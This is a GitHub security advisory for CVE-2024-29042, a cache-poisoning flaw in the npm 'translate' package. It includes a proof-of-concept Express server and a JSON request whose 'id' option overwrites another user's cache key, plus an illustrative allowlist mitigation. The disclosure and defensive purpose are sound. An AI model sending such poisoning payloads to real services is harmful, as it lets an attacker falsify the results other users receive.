GHSA-882J-4VJ5-7VMJ
Vulnerability from github – Published: 2024-03-22 16:57 – Updated: 2024-03-22 20:02
Summary
Cache Poisoning Vulnerability
Details
Summary
An attacker who controls the second argument of the `translate` function can perform a cache poisoning attack and change the outcome of translation requests made by subsequent users.
Details
The `opt.id` parameter allows the cache key to be overwritten. If an attacker sets `id` to the cache key that would be generated for another user's request, they can choose the response that user is served.
PoC
Take the following simple server allowing users to supply text and the language to translate to.
```javascript
import translate from "translate";
import express from 'express';

const app = express();
app.use(express.json());

app.post('/translate', async (req, res) => {
  // `language` is taken from the request body unchecked, so it may be an
  // object and reaches translate() as its options argument.
  const { text, language } = req.body;
  const result = await translate(text, language);
  return res.json(result);
});

const port = 3000;
app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});
```
We can send the following request to poison the cache:
```
{"text":"I hate you", "language":{"to":"nl","id":"undefined:en:nl:google:I love you"}}
```

Now any user who attempts to translate "I love you" to Dutch will get "I hate you" in Dutch as the response.

Impact
An attacker can control the results other users may get.
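For applications that cannot yet move to the fixed release (3.0.0), the request boundary can refuse anything but a plain language code. The following is an added example, not code from the advisory or the translate project: `translateModel`, `fakeEngine`, `safeLanguage`, `handleTranslate` and `ALLOWED_LANGUAGES` are hypothetical names, and the cache is a simplified model whose key layout is inferred from the key shown in the PoC.

```javascript
// Simplified model of the cache behaviour described in the advisory.
// Constructed for illustration; NOT the translate package's own code.
// Assumption: the key is url:from:to:engine:text, inferred from the PoC key.
const cache = new Map();
const cacheKey = (text, opt) =>
  opt.id || `${opt.url}:${opt.from}:${opt.to}:${opt.engine}:${text}`;

// Stand-in for the real engine call: tags the text with the target language.
const fakeEngine = (text, to) => `[${to}] ${text}`;

// Models the pre-3.0.0 behaviour: a caller-supplied id replaces the key.
function translateModel(text, opt) {
  const given = typeof opt === "string" ? { to: opt } : opt;
  const o = { from: "en", engine: "google", ...given };
  const key = cacheKey(text, o);
  if (!cache.has(key)) cache.set(key, fakeEngine(text, o.to));
  return cache.get(key);
}

// Hypothetical allowlist of the target languages this application offers.
const ALLOWED_LANGUAGES = new Set(["nl", "es", "fr", "de"]);

// Mitigation at the application boundary: accept only a plain, allowlisted
// language code, so no request field can become an option such as id.
function safeLanguage(language) {
  if (typeof language !== "string" || !ALLOWED_LANGUAGES.has(language)) {
    throw new TypeError("language must be a supported language code");
  }
  return language;
}

// Request handler logic with the check applied before the library call.
function handleTranslate(body) {
  if (typeof body.text !== "string") {
    throw new TypeError("text must be a string");
  }
  return translateModel(body.text, safeLanguage(body.language));
}
```

With the check in place, the object-valued `language` from the PoC request is rejected before it reaches the library, and later lookups for the same text are computed and cached under their own key.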
Severity
5.3 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "translate"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-29042"
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-22T16:57:21Z",
"nvd_published_at": "2024-03-22T17:15:07Z",
"severity": "MODERATE"
},
"details": "### Summary\nAn attacker controlling the second variable of the `translate` function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users.\n\n### Details\nThe `opt.id` parameter allows the overwriting of the cache key. If an attacker sets the `id` variable to the cache key that would be generated by another user, they can choose the response that user gets served.\n\n### PoC\nTake the following simple server allowing users to supply text and the language to translate to.\n```javascript\nimport translate from \"translate\";\nimport express from \u0027express\u0027;\n\nconst app = express();\napp.use(express.json());\n\napp.post(\u0027/translate\u0027, async (req, res) =\u003e {\n const { text, language } = req.body;\n const result = await translate(text, language);\n return res.json(result);\n});\n\nconst port = 3000;\napp.listen(port, () =\u003e {\n console.log(`Server is running on port ${port}`);\n});\n```\n\nWe can send the following request to poison the cache:\n```\n{\"text\":\"I hate you\", \"language\":{\"to\":\"nl\",\"id\":\"undefined:en:nl:google:I love you\"}}\n```\n\n\nNow, any user that attempts to translate \"I love you\" to Dutch, will get \"I hate you\" in Dutch as the response.\n\n\n\n### Impact\nAn attacker can control the results other users may get\n",
"id": "GHSA-882j-4vj5-7vmj",
"modified": "2024-03-22T20:02:15Z",
"published": "2024-03-22T16:57:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/franciscop/translate/security/advisories/GHSA-882j-4vj5-7vmj"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29042"
},
{
"type": "WEB",
"url": "https://github.com/franciscop/translate/commit/7a2bf8b9f05f7c45c09683973ef4d8e995804aa4"
},
{
"type": "WEB",
"url": "https://github.com/franciscop/translate/commit/cc1ba03078102f83e0503a96f1a081489bb865d3"
},
{
"type": "PACKAGE",
"url": "https://github.com/franciscop/translate"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Cache Poisoning Vulnerability"
}